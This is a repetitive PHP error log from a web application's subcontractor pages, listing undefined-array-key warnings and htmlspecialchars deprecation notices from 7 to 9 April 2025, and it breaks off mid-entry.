[07-Apr-2025 07:43:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:44:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:44:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:46:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:46:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:47:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:47:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:50:35 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:50:35 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:52:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:52:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:53:51 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:53:51 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:55:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:55:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:56:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:56:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:57:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:57:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:57:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:57:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:58:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:58:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:58:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:58:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:58:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:03:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:19:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:19:22 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:19:22 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:22:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:22:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:23:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:27:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:27:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:30:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:30:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:32:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:32:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:32:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:32:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:32:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:34:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:35:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:35:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:35:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:36:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:36:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:37:20 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:37:20 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:38:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:38:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:39:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:39:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:41:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:41:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:42:28 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:42:28 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:45:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:45:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:47:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:47:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:50:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:50:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:51:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:51:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:52:58 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:52:58 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:53:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:53:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 10:14:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 10:44:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 13:11:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 22:26:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 22:40:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 23:44:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 01:29:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 01:36:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 02:30:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 03:21:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 03:25:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 03:25:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 03:25:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 03:26:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 03:27:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 03:27:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 03:59:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 03:59:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 04:11:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 04:11:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 04:25:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 06:15:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 06:33:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 07:10:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 07:42:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 07:44:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 08:04:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 08:05:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:05:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:07:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:07:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:09:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 08:09:22 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:09:22 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:09:32 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:09:32 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:11:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:11:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:13:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:13:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:20:49 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:20:49 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:20:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:20:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:24:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:24:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:25:01 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:25:01 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:27:53 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:27:53 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:28:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:28:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:32:44 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:32:44 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:38:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:38:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 10:51:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 11:00:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 12:13:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 00:47:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 00:59:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 01:23:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 02:03:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 02:04:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 02:04:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 02:12:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 02:12:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 02:15:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 02:15:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 02:16:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 02:20:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 02:39:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 03:13:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 03:13:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 03:13:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 03:37:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 03:42:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 03:43:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 03:58:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 04:27:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 04:34:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 04:34:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 04:34:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 04:36:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 04:36:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 05:01:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:26:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:26:45 UTC] PHP 